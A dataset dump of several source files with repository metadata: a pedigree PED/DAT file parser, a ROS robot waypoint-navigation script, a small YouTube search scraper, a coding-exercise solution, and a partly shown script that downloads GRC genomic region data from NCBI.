blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bdc87f3315390e5fc8eb03321ccd018f13499ff4 | a00c8a827cac629e2d6319609090ae74663fe701 | /biu/formats/pedUtils.py | 044d1aac7316d5fe019328c36168e60105012ea3 | [] | no_license | thiesgehrmann/BIU | 78a7278665733eaa5f283296ee8a3cb61c9c7cb6 | c6031b24541ae8b1ee1870c8249f8c4929ff12d1 | refs/heads/master | 2021-10-07T17:11:19.214872 | 2021-09-27T11:44:05 | 2021-09-27T11:44:05 | 145,121,659 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 20,889 | py | from .. import utils
import errno
import re
import os
import csv
###############################################################################
# TO MATCH THE MERLIN documentation
class Individual(object):
__slots__ = [ '__famID', '__indivID', '__fatherID', '__motherID', '__gender', '__features' ]
def __init__(self, famID, indivID, fatherID, motherID, gender, features):
self.__famID = str(famID)
self.__indivID = str(indivID)
self.__fatherID = fatherID
self.__motherID = motherID
self.__gender = gender
self.__features = features
#edef
def __str__(self):
dstr = "Pedigree Individual\n"
dstr += " Family ID: %s\n" % self.__famID
dstr += " Individual ID: %s\n" % self.__indivID
dstr += " Mother/Father ID: %s/%s\n" % (self.__motherID, self.__fatherID)
dstr += " Gender: %s\n" % self.__gender
dstr += " Affection status:\n"
for affection in self.__features.affections:
dstr += " %s : %s" % (self.__features.getFeatureName(affection), self.__features[affection])
#efor
return dstr
#edef
def toRow(self):
row = [self.__famID, self.__indivID,
self.__fatherID if self.__fatherID is not None else '0',
self.__motherID if self.__motherID is not None else '0',
self.__gender] + self.__features.raw
return row
#edef
@staticmethod
def fromRow(row, datFormat):
row = [ e.strip() for e in row ]
famID = str(row[0])
indivID = str(row[1])
father = None if row[2] == '0' else row[2]
mother = None if row[3] == '0' else row[3]
gender = 'm' if (row[4] in [ '1', 'm' ]) else 'f'
features = PhenoGenotype(row[5:], datFormat)
return Individual(famID, indivID, father, mother, gender, features)
#edef
@property
def famID(self):
return self.__famID
#edef
@property
def ID(self):
return self.__indivID
#edef
def setID(self, newID):
self.__indivID = newID
#edef
@property
def fatherID(self):
return self.__fatherID
#edef
def setFather(self, newID):
self.__fatherID = newID
#edef
@property
def motherID(self):
return self.__motherID
#edef
def setMother(self, newID):
self.__motherID = newID
#edef
@property
def gender(self):
return self.__gender
#edef
@property
def features(self):
return self.__features
#edef
@property
def isFounder(self):
return (self.fatherID is None) and (self.motherID is None)
#edef
def getFeature(self, feature):
return self.__features[feature]
#edef
def setFeature(self, feature, value):
self.__features[feature] = value
#edef
def copy(self, datFormat):
features = self.__features.copy(datFormat)
return Individual(self.famID, self.__indivID, self.__fatherID, self.motherID, self.gender, features)
#edef
#eclass
###############################################################################
class PhenoGenotype(object):
__slots__ = [ '__row', '__datFormat' ]
def __init__(self, row, datFormat):
self.__row = row
self.__datFormat = datFormat
nFeaturesRow = len(row)
nFeaturesDat = len(datFormat)
fixedRow = { datFormat.getFeatureName(i) : datFormat.emptyValueOfField(i) for i in range(nFeaturesDat) }
rowIndex = 0
datIndex = 0
while datIndex < nFeaturesDat:
if rowIndex >= nFeaturesRow:
break
#fi
featureName = datFormat.getFeatureName(datIndex)
featureType = self.__datFormat.getFeatureType(datIndex)
if (featureType == 'm') and ('/' not in row[rowIndex]):
fixedRow[featureName] = '%s/%s' % (row[rowIndex], row[rowIndex+1])
rowIndex += 2
datIndex += 1
else:
fixedRow[featureName] = row[rowIndex]
rowIndex += 1
datIndex += 1
#fi
#ewhile
self.__row = fixedRow
if rowIndex < nFeaturesRow:
utils.error("More provided features than in DAT file. IGNORED!")
elif datIndex < nFeaturesDat:
utils.error("More DAT features than provided. Filling with unknown values. Verify your PED/DAT file.")
#fi
#edef
@property
def raw(self):
row = [ str(self.__row[featureName]) for (featureType, featureName) in self.__datFormat ]
return row
#edef
def __getitem__(self, identifier):
if isinstance(identifier, int):
fieldName = self.__datFormat.getFeatureName(identifier)
if fieldName is None:
return None
#fi
return self.__row[fieldName]
elif isinstance(identifier, str):
return self.__row[identifier]
#fi
return None
#edef
def __len__(self):
return len(self.__row) if self.__row is not None else 0
#edef
def __setitem__(self, key, value):
if isinstance(key, int):
fieldName = self.__datFormat.getFeatureName(key)
if fieldName is None:
return None
#fi
self.__row[fieldName] = value
elif isinstance(key, str):
self.__row[key] = value
#fi
return None
#edef
def getFeatureName(self, identifier):
return self.__datFormat[identifier][2]
#edef
@property
def affections(self):
return self.__datFormat.affections
#edef
@property
def covariates(self):
return self.__datFormat.covariates
#edef
@property
def traits(self):
return self.__datFormat.traits
#edef
@property
def markers(self):
return self.__datFormat.markers
#edef
def emptyValueOfField(self, fieldID):
return self.__datFormat.emptyValueOfField(self, fieldID)
#edef
def __str__(self):
dstr = "Genotype and Phenotype Object\n"
for fieldName in self.__row:
dstr += " %s: %s\n" % (fieldName, self.__row[fieldName])
#efor
return dstr
#edef
def copy(self, datFormat):
return PhenoGenotype(self.raw, datFormat)
#edef
#eclass
###############################################################################
class Family(object):
slots = [ '__famID', '__members', '__datFormat' ]
def __init__(self, famID, datFormat, members=[]):
self.__famID = str(famID)
self.__datFormat = datFormat
if isinstance(members, dict):
self.__members = members
else:
self.__members = { member.ID : member for member in members }
#fi
#edef
def __str__(self):
dstr = ""
dstr += "Pedigree Family\n"
dstr += " Members: %d\n" % len(self.__members)
dstr += " Founders: %d\n" % self.nFounders
return dstr
#edef
def __contains__(self, memberID):
return str(memberID) in self.__members
#fi
@property
def famID(self):
return self.__famID
#edef
def add(self, individual):
if isinstance(individual, Individual):
if individual.ID in self.__members:
utils.dbm("Overwriting individual '%s' in family '%s'" % (individual.ID, self.famID))
#fi
self.__members[individual.ID] = individual
else:
utils.error("Cannot add this object to family")
#fi
#edef
def newMember(self, indivID, fatherID, motherID, gender):
if isinstance(fatherID, Individual):
if fatherID.famID != self.famID:
utils.error("Family ID of father (%s) is not this family: '%s'" %(father.famID, self.famID))
return None
#fi
fatherID = fatherID.ID
elif (fatherID is not None) and (fatherID not in self.__members):
utils.warning("FatherID '%s' is not present in this family." % fatherID)
#fi
if isinstance(motherID, Individual):
if motherID.famID != self.famID:
utils.error("Family ID of mother (%s) is not this family: '%s'" %(mother.famID, self.famID))
return None
#fi
motherID = motherID.ID
elif (motherID is not None) and (motherID not in self.__members):
utils.warning("MotherID '%s' is not present in this family." % motherID)
#fi
features = PhenoGenotype([], self.__datFormat)
newPerson = Individual(self.famID, indivID, fatherID, motherID, gender, features)
self.add(newPerson)
return newPerson
#edef
def delMember(self, memberID):
memberID = str(memberID)
if memberID in self.__members:
del self.__members[memberID]
for member in self.__members:
if self.__members[member].motherID == memberID:
self.__members[member].setMother(None)
elif self.__members[member].fatherID == memberID:
self.__members[member].setFather(None)
#fi
#efor
#fi
#edef
def __len__(self):
return len(self.__members)
#edef
def __iadd__(self, individual):
self.add(individual)
#edef
@property
def nFounders(self):
return len([m for m in self.__members.values() if m.isFounder])
#edef
@property
def members(self):
return self.__members
#edef
def __iter__(self):
return self.__members.__iter__()
#edef
def __getitem__(self, key):
return self.members[key]
#edef
def changeMemberID(self, currentID, newID):
if currentID not in self.__members:
utils.warning("Cannot change name of '%s', no such member." % currentID)
return
#fi
self.__members[newID] = self.__members[currentID]
self.__members[newID].setID(newID)
del self.__members[currentID]
for memberID in self.__members:
if memberID != newID:
if self.__members[memberID].motherID == currentID:
self.__members[memberID].setMother(newID)
elif self.__members[memberID].fatherID == currentID:
self.__members[memberID].setFather(newID)
#fi
#fi
#efor
#edef
def copy(self, datFormat):
members = { memberID: self.__members[memberID].copy(datFormat) for memberID in self.__members }
return Family(self.famID, datFormat, members)
#edef
#eclass
###############################################################################
class DAT(object):
__slots__ = [ '__fields', '__mask', '__types', '__names', '__fileName' ]
def __init__(self, data, delimiter=' ', quotechar='#', mask=None):
self.__fields = None
self.__types = None
self.__names = None
self.__fileName = None
self.__mask = None
fields = []
if isinstance(data, str):
with open(data, 'r') as ifd:
reader = csv.reader(ifd, delimiter=delimiter, quotechar=quotechar)
for row in reader:
row = [ col for col in row if col != "" ]
if len(row) != 2:
continue
#fi
fieldType = row[0].lower()
fieldValue = row[1]
if fieldType == 'e':
break
#fi
if fieldType not in [ 'a', 'c', 't', 'm', 's' ]:
utils.warning("Unknown fieldType '%s'" % fieldType)
fieldType = 's'
#fi
fields.append((fieldType, fieldValue))
#efor
#ewith
self.__fields = fields
self.__fileName = data
else:
self.__fields = data
#fi
if (mask is None) or len(mask) != len(self.__fields):
self.__mask = [ False for field in self.__fields ]
else:
self.__mask = mask
#fi
self.__indexFields()
#edef
def __indexFields(self):
self.__types = {}
self.__names = {}
for i, (fieldType, fieldName) in enumerate(self.__fields):
fieldType = fieldType.lower()
if fieldType not in self.__types:
self.__types[fieldType] = []
#fi
self.__types[fieldType].append(i)
self.__names[fieldName] = i
#efor
def add(self, fieldType, fieldName):
if fieldName in self.__names:
utils.error("Field '%s' already exists." % fieldName)
return
#fi
fieldType = fieldType.lower()
if fieldType not in 'actms':
utils.error("'%s' not a valid field type." % fieldType)
else:
self.__fields.append((fieldType, fieldName))
self.__indexFields()
self.__mask.append(False)
#fi
#edef
@property
def affections(self):
return self.__types['a'] if 'a' in self.__types else []
#edef
def emptyFeatures(self):
return [ self.emptyValueOfField(fieldType) for (fieldType, fieldName) in self.__fields ]
#edef
@property
def covariates(self):
return self.__types['c'] if 'c' in self.__types else []
#edef
@property
def traits(self):
return self.__types['t'] if 't' in self.__types else []
#edef
@property
def markers(self):
return self.__types['m'] if 'm' in self.__types else []
#edef
def __getitem__(self, identifier):
if isinstance(identifier, int):
fieldType, fieldName = self.__fields[identifier]
return (identifier, fieldType, fieldName)
elif isinstance(identifier, str):
fieldID = self.__names[identifier]
fieldType, fieldName = self.__fields[fieldID]
return (fieldID, fieldType, fieldName)
else:
return None
#fi
#edef
def __len__(self):
return len(self.__fields)
def __iter__(self):
return self.__fields.__iter__()
#edef
def keys(self):
return self.__names
#edef
def __contains__(self, field):
return field in self.__names
#edef
def getFeatureType(self, field):
fieldID, fieldType, fieldName = self[field]
return fieldType
#eidef
def setFeatureType(self, field, newFieldType):
fieldID, fieldType, fieldName = self[field]
newFieldType = newFieldType.lower()
if newFieldType in [ 'a', 'c', 't', 'm', 's' ]:
self.__fields[fieldID] = (newFieldType, fieldName)
else:
utils.error("Invalid feature type '%s'." % newFieldType)
#edef
def getFeatureName(self, field):
fieldID, fieldType, fieldName = self[field]
return fieldName
#eidef
def getFeatureID(self, fieldName):
fieldID, fieldType, fieldName = self[fieldName]
return fieldID
#edef
def maskFeature(self, featureName):
featureID, featureType, featureName = self[featureName]
self.__mask[featureID] = True
#edef
def unmaskFeature(self, featureName, newFeatureType=None):
featureID, featureType, featureName = self[featureName]
self.__mask[featureID] = False
if newFeatureType is not None:
self.setFeatureType(featureName, newFeatureType)
self.__mask[featureID] = False
#edef
def detectType(self, value):
if ('/' in value) or ( ' ' in value):
return 'm'
elif value.upper() == 'X':
return 't'
elif value in [ '0', '1', '2' ]:
return 'a'
else:
return 's'
#fi
#edef
def emptyValueOfField(self, fieldID):
fieldID, fieldType, fieldName = self[fieldID]
if fieldType == 'a':
return 'X'
elif fieldType == 'c':
return 'X'
elif fieldType == 't':
return 'X'
elif fieldType == 'm':
return '0/0'
elif fieldType == 's':
return 'X'
else:
return '0'
#fi
#edef
def write(self, fileName):
with open(fileName, "w") as ofd:
for i, (fieldType, fieldName) in enumerate(self.__fields):
fieldType = 'S' if self.__mask[i] else fieldType.upper()
ofd.write("%s %s\n" % (fieldType, fieldName))
#efor
ofd.write("E\tEND-OF-DATA\n")
self.__fileName = fileName
#ewith
#edef
def copy(self):
return DAT([ (fieldType, fieldName) for (fieldType, fieldName) in self.__fields], mask=self.__mask)
#edef
#eclass
###############################################################################
class PED(object):
__slots__ = [ 'families', '__fileName', '__datFile', '__datFormat' ]
def __init__(self, data, datFile=None, datFormat=None, **kwargs):
self.families = {}
self.__fileName = None
self.__datFile = datFile
self.__datFormat = None
if datFormat is not None:
self.__datFormat = datFormat
elif isinstance(datFile, str):
self.__datFormat = DAT(datFile)
self.__datFile = datFile
else:
utils.warning("You must provide a DAT file to match. I will try to guess them!")
self.__datFormat = DAT([])
self.__datFile = None
#fi
if isinstance(data, str):
self.families = PED.fromFile(data, self.__datFormat)
self.__fileName = data
elif isinstance(data, dict):
self.families = data
elif isinstance(data, Family):
self.families = { data.famID : data }
else:
self.families = { f.famID for f in data }
#fi
#edef
def __contains__(self, famID):
return str(famID) in self.families
#edef
def __getitem__(self, famID):
famID = str(famID)
if famID in self.families:
return self.families[famID]
#fi
return None
#edef
def __delitem__(self, famID):
famID = str(famID)
if famID in self.families:
del self.families[famID]
#fi
#edef
def subset(self, famIDs):
datFormatCopy = self.__datFormat.copy()
if isinstance(famIDs, str) or isinstance(famIDs, int):
famIDs = [ famIDs ]
#fi
famIDs = [ str(famID) for famID in famIDs ]
retFams = { famID : self.families[famID].copy(datFormatCopy) for famID in famIDs if (famID in self.families)}
return PED(data = retFams, datFormat=datFormatCopy)
#edef
def emptyFeatures(self):
self.__datFormat.emptyFeatures()
#edef
#def delFeature(self, featureName)
#def renameFeature(self, featureName)
def maskFeature(self, feature):
self.__datFormat.maskFeature(feature)
#edef
def unmaskFeature(self, feature, newFeatureType=None):
self.__datFormat.unmaskFeature(feature, newFeatureType)
#edef
def addFeature(self, featureType, featureName, defaultValue=None):
self.__datFormat.add(featureType, featureName)
emptyValue = self.__datFormat.emptyValueOfField(featureName) if defaultValue is None else defaultValue
for famID in self:
for memberID in self[famID]:
self[famID][memberID].setFeature(featureName, emptyValue)
#efor
#efor
#edef
def features(self):
return self.__datFormat.keys()
#edef
def getFeature(self, featureName):
values = {}
if featureName not in self.__datFormat:
utils.error("Feature '%s' doesn't exist." % featureName)
return values
#fi
for famID in self.families:
family = self[famID]
for memberID in family:
values[(famID, memberID)] = family[memberID].getFeature(featureName)
#efor
#efor
return values
#edef
def __iter__(self):
return self.families.__iter__()
#edef
def newFamily(self, famID):
famID = str(famID)
if famID in self.families:
utils.warning("Overwriting family '%s'." % famID)
#fi
self.families[famID] = Family(famID, self.__datFormat, [])
return self.families[famID]
#edef
@staticmethod
def fromFile(fileName, datFormat, delimiter='\t', quotechar='#', nrows=None, **kwargs):
irow = 0
families = {}
with open(fileName, 'r') as ifd:
rePattern = re.compile(r"[\s]+")
for line in ifd:
row = [ col for col in rePattern.split(line) if col != "" ]
irow = irow + 1
if (nrows is not None) and (irow > nrows):
utils.dbm("I will; break here")
break
#fi
if len(row) < 5:
break
#fi
indiv = Individual.fromRow(row, datFormat)
if indiv.famID not in families:
families[indiv.famID] = Family(indiv.famID, datFormat, [indiv])
else:
families[indiv.famID].add(indiv)
#fi
#efor
#ewith
return families
#edef
@property
def nFeatures(self):
return len(self.__datFormat)
#edef
def __str__(self):
dstr = "PED object\n"
dstr += " Where: %s\n" % (self.__fileName if self.__fileName is not None else hex(id(self)))
dstr += " DAT file: %s\n" % (self.__datFile if self.__datFile is not None else hex(id(self.__datFormat)))
dstr += " Families: %d\n" % len(self.families)
dstr += " Founders: %d\n" % sum([ self.families[famID].nFounders for famID in self.families ])
dstr += " Total: %d\n" % ( sum([ len(self.families[famID]) for famID in self.families ]) )
dstr += " Features: %d\n" % (self.nFeatures)
dstr += " Affections: %d\n" % len(self.__datFormat.affections)
dstr += " Covariates: %d\n" % len(self.__datFormat.covariates)
dstr += " Traits: %d\n" % len(self.__datFormat.traits)
dstr += " Markers: %d\n" % len(self.__datFormat.markers)
return dstr
#edef
def write(self, fileName, datFileName=None):
if datFileName is None:
if fileName[-3:].lower() == 'ped':
datFileName = fileName[:-3] + 'dat'
else:
datFileName = fileName + '.dat'
#fi
#fi
with open(fileName, 'w') as ofd:
for famID in self.families:
for memberID in self.families[famID].members:
member = self.families[famID][memberID]
row = member.toRow()
ofd.write('\t'.join(row) + '\n')
#efor
#efor
self.__fileName = fileName
#ewith
self.__datFormat.write(datFileName)
#edef
standardValues = {
'affected_true' : 2,
'affected_false' : 1,
'affected_unknown' : 0,
}
#eclass
| [
"tgehrmann@shark.researchlumc.nl"
] | tgehrmann@shark.researchlumc.nl |
584b62ac1c40023ce693c76df2c3138f396308c1 | aa65d15af356165db479f5357afe78d939a85eb4 | /cs3027/practicals/catkin_ws/src/practical_03_07/a_to_many.py | e0563f319c233cf33c38ac2a15ca2311e2a2ac87 | [] | no_license | KNejad/university_notes | d9de478437452e2f07467798bcb774f049a2cf01 | ee7df9aa39cd9a383558b8205ebad02bbf23a95c | refs/heads/master | 2021-06-06T00:50:37.527538 | 2020-01-19T10:40:32 | 2020-01-19T10:40:32 | 71,895,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,117 | py | #!/usr/bin/env python
import rospy
import tf
import math
from geometry_msgs.msg import Point
from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Header
class AToMany:
dangerous_obstacles = []
def __init__(self):
rospy.init_node("a_to_many", anonymous=True)
rospy.Subscriber("/base_pose_ground_truth", Odometry, self.odometry_callback)
rospy.Subscriber("/base_scan", LaserScan, self.laser_scanner_callback)
self.rate = rospy.Rate(5)
self.velocity_publisher = rospy.Publisher('/cmd_vel', Twist, queue_size=10)
self.tf_listener = tf.TransformListener()
def odometry_callback(self, odometry_data):
self.pose = odometry_data.pose.pose
def laser_scanner_callback(self, laser_scan):
current_angle = laser_scan.angle_min
for laser_range in laser_scan.ranges:
if laser_range < laser_scan.range_max:
if not hasattr(self, "pose"):
return False
obstacle = self.convert_laser_range_to_point(laser_range, current_angle)
if self.euclidean_distance(obstacle.point) < 0.5:
self.dangerous_obstacles.append(self.convert_to_frame("/odom", obstacle))
current_angle += laser_scan.angle_increment;
def convert_laser_range_to_point(self, laser_range, current_angle):
x = laser_range*math.cos(current_angle)
y = laser_range*math.sin(current_angle)
return PointStamped(header=Header(stamp=rospy.Time.now(),frame_id="/base_link"), point=Point(x, y, 0))
def euclidean_distance(self, a, b=Point(0,0,0)):
return math.sqrt(pow(a.x - b.x, 2) + pow(a.y - b.y, 2))
def angular_velocity(self, local_frame_goal):
return math.atan2(local_frame_goal.y, local_frame_goal.x)
def convert_to_frame(self, frame, stamped_point):
try:
self.tf_listener.waitForTransform(frame, stamped_point.header.frame_id, rospy.Time(), rospy.Duration(4))
return self.tf_listener.transformPoint(frame, stamped_point)
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
return False
def check_if_safe(self):
if len(self.dangerous_obstacles) > 0:
closest_obstacle = min(self.dangerous_obstacles, key=lambda x: self.euclidean_distance(x.point))
error_message = f"Obstacle at: {closest_obstacle.point.x}, {closest_obstacle.point.y}"
rospy.logerr(error_message)
rospy.signal_shutdown(error_message)
return False
else:
return True
def go_to(self, destination):
local_frame_goal = self.convert_to_frame("/base_link", destination).point
while self.euclidean_distance(local_frame_goal) > 0.05:
self.check_if_safe()
local_frame_goal = self.convert_to_frame("/base_link", destination)
if not local_frame_goal:
continue
local_frame_goal = local_frame_goal.point
vel_msg = Twist()
vel_msg.linear.x = self.euclidean_distance(local_frame_goal)
vel_msg.angular.z = self.angular_velocity(local_frame_goal)
self.velocity_publisher.publish(vel_msg)
self.rate.sleep()
def go_to_many(self, destinations):
destinations.sort(key=lambda x: self.euclidean_distance(self.convert_to_frame("/base_link", x).point))
for destination in destinations:
self.go_to(destination)
rospy.loginfo(f"Made it to {destination.point.x}, {destination.point.y}")
if __name__ == "__main__":
try:
robot = AToMany()
x_y_points = [[14.49, 21.47], [20.33, 36.43], [20.95, 25.91], [27.15, 29.86]]
stamped_points = [PointStamped(header=Header(stamp=rospy.Time(),frame_id="/odom"), point=Point(point[0], point[1], 0)) for point in x_y_points]
robot.go_to_many(stamped_points)
except rospy.ROSInterruptException:
pass
| [
"keeyan@keeyan.xyz"
] | keeyan@keeyan.xyz |
c78f4d355386932cfd24d664e04f52fa4f14df1b | 017c54ec04bd23d04a1a4e3861c6b6ff00dff540 | /ytsearch.py | c9bb1461254a76c4e65244f42148752edff18006 | [] | no_license | Trisert/PythonScripts | 225332e652c372e23ee6040ea4bcf31348fe40ed | 81f07d43e726fa0407f15d4ce87a0de02213911d | refs/heads/main | 2023-07-07T22:26:18.462456 | 2021-08-19T08:17:01 | 2021-08-19T08:17:01 | 304,888,415 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | import dmenu
import urllib.request
import re
search_keyword = input("Inserisci cosa vuoi cercare: ")
html = urllib.request.urlopen("https://www.youtube.com/results?search_query=" + search_keyword.replace(" ", "%"))
video_ids = re.findall(r"watch\?v=(\S{11})", html.read().decode())
dmenu.show(video_ids, lines=10)
#video_ids_len = len(video_ids)
#for i in range(video_ids_len):
#print("https://www.youtube.com/watch?v=" + video_ids[i])
| [
"nicolade03@gmail.com"
] | nicolade03@gmail.com |
a165b00639df30ff67b8848e4ad2a89cdbba26cf | e87d89f1dc6dae209bf62a2bae6a4a1bb6684eab | /이지원/0831_ 42576.py | 2d9b0eb4b301a6c443c4cbee6fd6f0a33f6d364c | [] | no_license | youngseok30/codingtest | 291c497a5240c8d1071a7daed32bd59a31488fa5 | 9461bb473a1f8724a2f374e05fd79a6ea30a38da | refs/heads/master | 2023-03-19T04:36:04.233681 | 2020-10-19T02:59:09 | 2020-10-19T02:59:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | # https://programmers.co.kr/learn/courses/30/lessons/42576
# 완주하지 못한 선수
def solution(participant, completion):
answer = ''
dict = {}
for p in participant:
dict[p] = dict.get(p, 0) + 1
for c in completion:
dict[c] -= 1
for key, value in dict.items():
if value == 1:
answer = key
break
return answer | [
"jiwon.swdev@gmail.com"
] | jiwon.swdev@gmail.com |
8abf522f039d7263cf9a85dd6f5c6d6307cf7568 | 4787babe647fbe4baf200dd6f2826e4b4c264de1 | /data/fetchRegion.py | 82366d9f1579f10b608f0c003f884d05c7b07ce8 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | glennhickey/vg2sg | 84611c0f1967e3e06630fa24e51350d24531f56c | 85ca2e8cf0b0e3815281b7adf8a2149a9803d435 | refs/heads/master | 2020-12-24T06:38:52.537300 | 2016-05-06T14:46:33 | 2016-05-06T14:46:33 | 39,136,801 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,655 | py | #!/usr/bin/env python2.7
#
# FROM https://raw.githubusercontent.com/adamnovak/sequence-graphs/master/scripts/fetchRegion.py
#
"""
fetchRegion.py: Fetch the sequence data, GRC alignments, and gene sets for a GRC
region (like "LRC_KIR" or "MHC") by name.
"""
import argparse, sys, os, os.path, random, subprocess, shutil, itertools
import collections, urllib2, shutil, subprocess, glob, doctest
import tsv
from Bio import AlignIO, SeqIO, Align, Entrez
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
def parse_args(args):
"""
Takes in the command-line arguments list (args), and returns a nice argparse
result with fields for all the options.
Borrows heavily from the argparse documentation examples:
<http://docs.python.org/library/argparse.html>
"""
# Construct the parser (which is stored in parser)
# Module docstring lives in __doc__
# See http://python-forum.com/pythonforum/viewtopic.php?f=3&t=36847
# And a formatter class so our examples in the docstring look good. Isn't it
# convenient how we already wrapped it to 80 characters?
# See http://docs.python.org/library/argparse.html#formatter-class
parser = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
# General options
parser.add_argument("region",
help="name of the region to download, and the output directory")
parser.add_argument("--assembly_url",
default=("ftp://ftp.ncbi.nlm.nih.gov/genomes/all/"
"GCA_000001405.17_GRCh38.p2/"
"GCA_000001405.17_GRCh38.p2_assembly_structure"),
help="URL for the assembly, containing genomic_region_definitions.txt")
parser.add_argument("--email", default="anovak@soe.ucsc.edu",
help="E-mail address to report to Entrez")
# The command line arguments start with the program name, which we don't
# want to treat as an argument for argparse. So we remove it.
args = args[1:]
return parser.parse_args(args)
def url_open_tsv(url):
"""
Open a TSV URL and loop through the lines as lists.
"""
try:
reader = tsv.TsvReader(urllib2.urlopen(url))
except urllib2.URLError as err:
print("Could not open " + url)
raise err
return reader
def get_region_info(region_name, assembly_root):
"""
Go download the genomic_region_definitions.txt from the specified assembly,
and return the (contig, start, end) of the named region.
"""
# Open the region definitions
for parts in url_open_tsv(assembly_root + "/genomic_regions_definitions.txt"):
# For every region in the list
if parts[0] == region_name:
# We found it. Parse out contig, start, end.
# Contig is like "CM000663.2" and not all that useful...
return (parts[1], int(parts[2]), int(parts[3]))
# If we get here, there's no region by that name.
raise RuntimeError("No region named " + region_name)
def get_region_sequences(region_name, assembly_root):
"""
Given the name of a region and the root URL for the assembly, yield all the
alt locus sequence names (Genbank IDs) and assembly unit names
(ALT_REF_LOCI_###) that are in the region.
"""
# Open the alt locus placement file
for parts in url_open_tsv(assembly_root + "/all_alt_scaffold_placement.txt"):
# For every alt locus...
if parts[7] == region_name:
# We found one in the correct region (which happens to be column 7)
# Give its sequence ID/accession with version (column 3) and the
# assembly unit name
yield parts[3], parts[0]
def get_record_by_grc(grc_id):
"""
Given a GRC ID, return the Entrez nucleotide DocSum record.
"""
# First just search the ID as a search term.
search_results = Entrez.read(Entrez.esearch("nucleotide", term=grc_id))
if len(search_results["IdList"]) > 1:
# We should only get one result. If we have many, we might be looking at
# the wrong one.
print(search_results)
raise RuntimeError("Too many results!")
# Grab the handle thingy for the first search result
first_handle = Entrez.read(Entrez.epost("nucleotide",
id=search_results["IdList"][0]))
# Actually download that record
record = Entrez.read(Entrez.esummary(db="nucleotide",
webenv=first_handle["WebEnv"], query_key=first_handle["QueryKey"]))[0]
# Return it
return record
def get_ucsc_name(grc_id, alt_parent_grc_id=None):
"""
Given a GRC-style (genbank) ID with version, like "CM000663.2" or
"GL383549.1" or "KI270832.1", get the UCSC name for that sequence, like
"chr6_GL000252v2_alt".
If the sequence is an alt, the GRC id of its parent chromosome must be
specified.
"""
if alt_parent_grc_id is None:
# Simple case; it's a primary chromosome.
# Fetch the record
record = get_record_by_grc(grc_id)
# Parse out all the "extra" fields
extra_parts = record["Extra"].split("|")
# Find the "gnl" key
gnl_index = extra_parts.index("gnl")
# The chromosome number/letter is two fields later.
chromosome_character = extra_parts[gnl_index + 2]
# Make it chrThat
ucsc_name = "chr{}".format(chromosome_character)
else:
# We do have a parent. Get its UCSC name.
parent_name = get_ucsc_name(alt_parent_grc_id)
# Convert from .2 or whatever to v2 or whatever
name_middle = grc_id.replace(".", "v")
# Put them in the name pattern template to generate the name
ucsc_name = "{}_{}_alt".format(parent_name, name_middle)
# Report the result
print("{} is {} at UCSC".format(grc_id, ucsc_name))
return ucsc_name
def get_gi_number(grc_id):
"""
Given a GRC-style (genbank) ID with version, like "CM000663.2" or
"GL383549.1" or "KI270832.1", get the GI number associated with that ID from
Entrez.
"""
# Go fetch the record
record = get_record_by_grc(grc_id)
print("{} = {}".format(grc_id, record["Gi"]))
# Return the GI number. TODO: should this be the ID instead because of how
# we use it next? Are they ever different?
return record["Gi"]
def get_length(gi_id):
"""
Get the length of a sequence given its numerical GI number.
"""
# Grab the handle thingy for the record with this ID
handle = Entrez.read(Entrez.epost("nucleotide", id=str(gi_id)))
# Actually download that record
record = Entrez.read(Entrez.esummary(db="nucleotide",
webenv=handle["WebEnv"], query_key=handle["QueryKey"]))[0]
# Return the length of the sequence
return record["Length"]
def get_sequence(gi_id, start=None, end=None):
"""
Get a sequence by numerical GI number, optionally with start and end
parameters (in 1-based coordinates from the left). If start is
specified, end must also be specified.
"""
if start is None:
# Go fetch the whole record. We need to make the ID a str or the API
# client freaks out.
fetch_handle = Entrez.efetch(db="nucleotide", id=str(gi_id),
rettype="fasta")
else:
# Just fetch part of it
fetch_handle = Entrez.efetch(db="nucleotide", id=str(gi_id),
rettype="fasta", seq_start=start, seq_end=end)
# Load up the FASTA record
record = SeqIO.read(fetch_handle, "fasta")
# Change the record FASTA ID to just GIwhatever
record.id = "GI{}".format(gi_id)
# Return the fixed-up record
return record
def download_gff3(ref_acc, alt_acc, alt_unit, assembly_root, out_filename):
"""
Download the GFF3 alignment between the given reference accession and the
given alt accession (in the given assembly unit), from the given assembly
root URL, and save it to the given output filename.
"""
# Figure out what we want to download
gff3_url = "{}/{}/alt_scaffolds/alignments/{}_{}.gff".format(assembly_root,
alt_unit, alt_acc, ref_acc)
# Open the URL to read
in_stream = urllib2.urlopen(gff3_url)
with open(out_filename, "w") as out_stream:
# Copy everything to the output file as in
# <http://stackoverflow.com/a/5397438/402891>
shutil.copyfileobj(in_stream, out_stream)
def get_genes(grc_id, out_name, start=1, end=None, alt_parent_grc_id=None,
db="hg38"):
"""
Given a GRC ID (like "CM000663.2"), the name of the contig on which to
report the genes, optional start and end coordinates (1-based) and the GRC
ID of the parent chromosome if it is an alt, yield BED lines for all the
genes in the specified region.
